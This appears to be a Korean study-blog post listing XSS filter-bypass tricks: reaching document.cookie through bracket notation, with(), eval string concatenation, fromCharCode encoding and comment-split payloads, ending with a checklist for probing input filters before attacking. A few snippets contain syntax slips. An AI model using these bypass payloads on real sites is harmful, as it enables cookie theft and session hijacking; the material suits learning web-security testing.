์ƒˆ์†Œ์‹

์ธ๊ธฐ ๊ฒ€์ƒ‰์–ด

๐Ÿ“  Secure

XSS ์šฐํšŒ ๊ณต๊ฒฉ

  • -
๋ฐ˜์‘ํ˜•

 

document.cookie ์šฐํšŒ
document["cookie"]
# document.cookie == documet["cookie"] ๋ฅผ ์ฆ๋ช…

var obj = {"id":"iu" , "name":"์ด์ง€์€" , "age":"30"}
var result1 = obj.id;
var result2 = obj["id"];

document.write(result1);
document.write(result2);

<script>alert(document["cookie"])</script>

 

document.cookie ์šฐํšŒ
with(document){ alert(cookie); }
# document.cookie == with(document){alert(cookie);} ๋ฅผ ์ฆ๋ช…

var obj = {"id":"iu" , "name":"์ด์ง€์€" , "age":"30"}
with(obj){
    document.write(id);
}

<script>with(document{alert(cookie);}</script>

 

eval ํ•จ์ˆ˜ ๊ฒ€์ฆ ์šฐํšŒ
์‹ค์ œ๋กœ ๋‹ค์–‘ํ•œ ๊ฐœ๋ฐœ ์ฝ”๋”ฉ์—์„œ๋„ ์‚ฌ์šฉํ•˜๋Š” ํ•จ์ˆ˜

๋‹จ์ˆœํ•œ ๋ฌธ์ž์—ด ์ž์ฒด๋ฅผ ์ž๋ฐ”์Šคํฌ๋ฆฝํŠธ ์ฝ”๋“œ๋กœ ์‹คํ–‰

ํ”„๋กœ๊ทธ๋ž˜๋ฐ์—์„œ ๋งŽ์€ ํŽธ๋ฆฌ์„ฑ์„ ์ œ๊ณตํ•˜์ง€๋งŒ ์•…์šฉํ•˜๋ฉด ์‹ฌ๊ฐํ•œ ๋ฌธ์ œ

# ๋ฌธ์ž์—ด์ธ alert์„ eval ํ•จ์ˆ˜๊ฐ€ ๋“ค์–ด๊ฐ€๋ฉด ์ž๋ฐ”์Šคํฌ๋ฆฝํŠธ ์ฝ”๋“œ๋กœ ์‹คํ–‰
eval("alert('test')");
var x = 1;
var y = 10;
var result = 0;

eval("result = x+y");
document.write(result);

eval ํ•จ์ˆ˜์—์„œ ํ˜•ํƒœ๋Š” String ํ˜•ํƒœ , ์‹คํ–‰ํ• ์‹œ์—” ์ฝ”๋“œ

# eval ์šฐํšŒ ์‚ฌ์šฉ 1
<script>eval("alert(document.cookie)")</script>

# eval ์šฐํšŒ ์‚ฌ์šฉ 2
# alert | document | cookie ๋ชจ๋‘ ๊ธˆ์ง€ ํ•  ๊ฒฝ์šฐ
# eval์€ ๋ฌธ์ž์—ด๋กœ ๊ฐ€๋Šฅํ•˜๊ธฐ ๋•Œ๋ฌธ์— ""์™€+๋กœ ์ด์–ด์“ฐ๊ธฐ ๊ฐ€๋Šฅ
eval("ale"+"rt"+"(docu"+"ment.cookie)");

BurpSuite์—์„œ Proxy์—์„œ document.cookie ์ž‘์„ฑ ํ›„ ๋“œ๋ž˜๊ทธ , ์˜ค๋ฅธ์ชฝ ๋ฒ„ํŠผ ํด๋ฆญ

# eval ์šฐํšŒ ์‚ฌ์šฉ 3
# document.cookie๋ฅผ ์•„์Šคํ‚ค์ฝ”๋“œ๋กœ ๋ฌธ์ž์—ด ๋ณ€๊ฒฝ
document.cookie
String.fromCharCode(13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101)
๊ธธ์ด์ œํ•œ ์šฐํšŒ
# ๋งŒ์•ฝ title์ด 20๊ธ€์ž๊ฐ€ ๋„˜์–ด๊ฐ€๋ฉด ์•ž์—์„œ๋ถ€ํ„ฐ 20๊ธ€์ž ์ถ”์ถœ ํ›„ ... ๋ถ™์ด๊ธฐ(๊ธธ์ด์ œํ•œ)
	if(strlen($title)>20){
			$title=substr($title,1,20)."...";	# PHP๋Š” ์—ฐ๊ฒฐ ์—ฐ์‚ฐ์ž๊ฐ€ . ์ด๋‹ค
		}
     
     
<script>alert/*
*/(document./*
*/cookie)</script>

 

1. ์‚ฌ์šฉ์ž ์ž…๋ ฅ๊ฐ’ ์œ„์น˜ ํ•™์ธ

2. <, >, " ์‚ฌ์šฉ ๊ฐ€๋Šฅ ์—ฌ๋ถ€

3. ๋ฌธ์ž ํ—ˆ์šฉ ๋ฆฌ์ŠคํŠธ ๋“ฑ ํ™•์ธ

4. ์šฐํšŒ๊ฐ€ ๊ฐ€๋Šฅํ•œ์ง€ ํŒ๋‹จ : ํŠน์ˆ˜๋ฌธ์ž๊ฐ€ ์‚ฌ์šฉ์ด ๋œ๋‹ค/์•ˆ๋œ๋‹ค > inputํƒœ๊ทธ๋ฉด ์šฐํšŒ ๊ฐ€๋Šฅ > " ํ—ˆ์šฉ๋˜๋Š” ์ž๋ฐ”

> ๋ฌธ์ž์—ด ๊ฒ€์—ด์ด ์žˆ๋‹ค - alert,document,cookie / ascii, ๊ฐœํ–‰/์ฃผ์„, ๋ฉค๋ฒ„ ๋ณ€ํ™˜

5. ๊ณต๊ฒฉ ์ง„ํ–‰

๋ฐ˜์‘ํ˜•

'๐Ÿ“  Secure' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

XSS ๊ณต๊ฒฉ - ์„ธ์…˜ ๊ฐ’ , ํ‚ค ๋กœ๊น…  (0) 2022.07.14
SESSION High jacking  (0) 2022.07.14
XSS ๊ณต๊ฒฉ ํ”„๋กœ์„ธ์Šค  (0) 2022.07.13
XSS - Cross Site Script  (0) 2022.07.12
Secure coding  (0) 2022.07.12
Contents

ํฌ์ŠคํŒ… ์ฃผ์†Œ๋ฅผ ๋ณต์‚ฌํ–ˆ์Šต๋‹ˆ๋‹ค

์ด ๊ธ€์ด ๋„์›€์ด ๋˜์—ˆ๋‹ค๋ฉด ๊ณต๊ฐ ๋ถ€ํƒ๋“œ๋ฆฝ๋‹ˆ๋‹ค.